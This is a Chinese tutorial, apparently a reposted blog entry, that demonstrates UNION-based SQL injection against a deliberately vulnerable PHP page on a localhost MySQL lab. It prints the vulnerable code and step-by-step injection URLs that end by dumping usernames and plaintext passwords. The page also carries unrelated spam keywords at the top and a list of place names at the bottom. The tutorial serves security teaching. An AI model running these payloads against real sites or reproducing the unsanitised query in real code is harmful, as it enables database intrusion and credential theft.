中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

一個PHP的SQL注入完整過程

發布時間:2020-02-25 13:08:14 來源:網絡 閱讀:454 作者:hanliyan111 欄目:web開發

一個PHP的SQL注入完整過程

(2008-04-16 15:10:47)

一個PHP的SQL注入完整過程轉載

標簽:

雜談

分類: IT技術---信息安全

一個PHP的SQL注入完整過程

學了SQL注入的一些技能后,以下正對PHP+MYSQL進行SQL注入的簡單實踐
首先觀察兩個MYSQL數據表
用戶記錄表:
CREATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');
產品記錄列表:
CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default '',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'p_w_picpaths/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'p_w_picpaths/name_2.jpg');

以下文件是show_product.php用于顯示產品列表。SQL注入也是利用此文件的SQL語句漏洞
<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "數據庫聯接錯誤";
exit;
}
if (!mysql_select_db("phpsql")) {
  echo "選擇數據庫出錯" . mysql_error();
  exit;
}
$tempID=$_GET['id'];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.'<br>';
$result = mysql_query($sql);
if (!$result) {
echo "查詢出錯" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "沒有查詢結果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
  echo 'ID:'.$row["id"].'<br>';
  echo 'name:'.$row["name"].'<br>';
  echo 'price:'.$row["price"].'<br>';
echo 'p_w_picpath:'.$row["img"].'<br>';
}
?>
觀察此語句:$sql = "SELECT * FROM php_product WHERE id =$tempID";
$tempID是從$_GET得到。我們可以構造這個變量的值,從而達到SQL注入的目的
分別構造以下鏈接:
1、http://localhost/phpsql/index.php?id=1
得到以下輸出
SELECT * FROM php_product WHERE id =1 //當前執行的SQL語句
//得到ID為1的產品資料列表
ID:1
name:name_1
price:12.2
p_w_picpath:p_w_picpaths/name_1.jpg
2、http://localhost/phpsql/index.php?id=1 or 1=1
得到輸出
SELECT * FROM php_product WHERE id =1 or 1=1 //當前執行的SQL語句
//一共兩條產品資料列表
ID:1
name:name_1
price:12.2
p_w_picpath:p_w_picpaths/name_1.jpg
ID:2
name:name_2
price:35.25
p_w_picpath:p_w_picpaths/name_2.jpg
1和2都得到資料列表輸出,證明SQL語句執行成功
3、判斷數據表字段數量
http://localhost/phpsql/index.php?id=1 union select 1,1,1,1
得到輸出
SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //當前執行的SQL語句
//一共兩條記錄,注意第二條的記錄為全1,這是union select聯合查詢的結果。
ID:1
name:name_1
price:12.2
p_w_picpath:p_w_picpaths/name_1.jpg
ID:1
name:1
price:1
p_w_picpath:1
4、判斷數據表字段類型
http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)
得到輸出
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)
ID:1
name:name_1
price:12.2
p_w_picpath:p_w_picpaths/name_1.jpg
ID:0
name:A
price:0
p_w_picpath:A
注意第二條記錄,如果后面的值等于A,說明這個字段與union查詢后面構造的字段類型相符。此時union后面
為char(65),表示字符串類型。經過觀察。可以發現name字段和p_w_picpath字段的類型都是字符串類型
5、大功告成,得到我們想要的東西:
http://localhost/phpsql/index.php?id=10000union select 1,username,1,password from php_user
得到輸出:
SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user
//輸出了兩條用戶資料,name為用戶名稱,p_w_picpath為用戶密碼。
ID:1
name:seven
price:1
p_w_picpath:seven_pwd
ID:1
name:swons
price:1
p_w_picpath:swons_pwd
注意URL中的ID=10000是為了不得到產品資料,只得到后面union的查詢結果。更具實際情況ID的值有所不同
union的username和password必須放在2和4的位置上。這樣才能和前面的select語句匹配。這是union查詢
語句的特點
備注:
這個簡單的注入方法是更具特定環境的。實際中比這復雜。但是原理是相同的。


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

兴山县| 壤塘县| 玉林市| 固镇县| 久治县| 桑日县| 莎车县| 仲巴县| 平舆县| 宜丰县| 南涧| 博兴县| 南投市| 四川省| 柳河县| 北辰区| 福清市| 牟定县| 凤城市| 章丘市| 宜宾市| 察雅县| 太白县| 曲周县| 黑山县| 舒兰市| 萍乡市| 松阳县| 阿拉善左旗| 肇州县| 新民市| 交口县| 句容市| 靖宇县| 乐东| 永靖县| 马关县| 扶沟县| 洪泽县| 本溪市| 宁乡县|